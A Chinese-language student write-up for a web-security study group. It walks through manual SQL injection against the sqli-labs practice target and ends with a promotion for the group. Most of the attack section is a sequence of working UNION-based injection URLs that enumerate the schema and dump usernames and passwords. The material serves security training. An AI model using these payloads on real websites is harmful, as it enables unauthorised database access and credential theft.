【学员分享】基于sql注入的sqli-lab靶场的手工注入

本文作者：啊昊（WEB安全攻防星球学员）

一、尝试

---

初始化页面如图

输入?id=1,后得到返回页面：

尝试单引号测试：?id=1',发现存在注入点

二、开始sql注入

---

1、找出页面中背后的数据表中列的数量

http://www.f.com/sqli-labs-master/Less-1/?id=1' or 1=2 order by 3 %23

不断尝试，当我们发现order by 4 时，出现报错

2、检测哪一列可以显示，并查处数据库名字和版本

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3 %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),version() %23

3、查询数据库中表的数量以及名称，并找出可能存在敏感信息的 表

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(*),2 from information_schema.TABLES where TABLE_SCHEMA='security'

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1

不断尝试，发现以下表中可能有敏感信息：

4、查处users表中的字段数以及名称

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(COLUMN_NAME),2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1%23

可以看出，该表字段数为3，依次是id,username,password

5、查询username,和password的值

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,concat(username,'---',password),2 from users %23

到此告一段落了！

总结

---

与之前的sqlmap注入相比较，发现手工注入需要更多的逻辑，心里要很清楚下一步代码该做什么，中 途会因为代码的一点错误导致页面报错。然后使用sqlmap这种工具的话，通过命令的方法就可以得到 想要的结果，速度也快。

在公众号回复"sql天书"，即可获得sqli-lab靶场使用手册。【成就未解锁】

扫描下方二维码加入WEB安全星球学习

加入后会邀请你进入内部微信群，内部微信群永久有效！

目前25000+人已关注加入我们